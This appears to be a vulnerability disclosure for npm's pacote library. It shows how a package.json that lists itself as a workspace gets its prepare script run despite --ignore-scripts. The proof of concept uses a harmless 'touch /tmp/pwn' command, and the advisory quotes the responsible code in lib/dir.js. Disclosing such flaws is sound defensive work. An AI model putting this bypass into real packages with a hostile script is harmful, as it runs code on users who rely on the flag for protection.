Summary

An attacker can craft a malicious package.json file that bypasses the --ignore-scripts security flag. This leads to arbitrary system command execution when a victim runs npm install --ignore-scripts on the malicious package.

Severity

Moderate - This vulnerability bypasses the --ignore-scripts option, which is intended to prevent malicious users from executing arbitrary build scripts.

Proof of Concept

A package.json that lists its own directory as a workspace, so that the package becomes a local directory dependency of itself, and defines a prepare script:

    {
      "name": "rce-test",
      "dependencies": {
      },
      "workspaces": [
        "."
      ],
      "scripts": {
        "prepare": "touch /tmp/pwn"
      }
    }

Further Analysis

When a local directory is listed as a dependency, pacote executes the prepare script even if the --ignore-scripts flag is set. This is because the dir fetcher never consults the ignore-scripts option before calling runScript; the only condition checked is that a prepare script exists (excerpt from pacote lib/dir.js at the linked commit):

    return runScript({
      pkg: mani,
      event: 'prepare',
      path: this.resolved,
      stdio,
      banner,
      env: {
        npm_package_resolved: this.resolved,
        npm_package_integrity: this.integrity,
        npm_package_json: resolve(this.resolved, 'package.json'),
      },
    })
  })  // closes the enclosing callback in which this call sits; the excerpt begins inside it

https://github.dev/npm/pacote/blob/a08a9a39bae0ddd73605b0d06bd227897d2f9567/lib/dir.js#L48-L60
Timeline
Date reported: 02/20/2023
Date fixed:
Date disclosed: 05/21/2023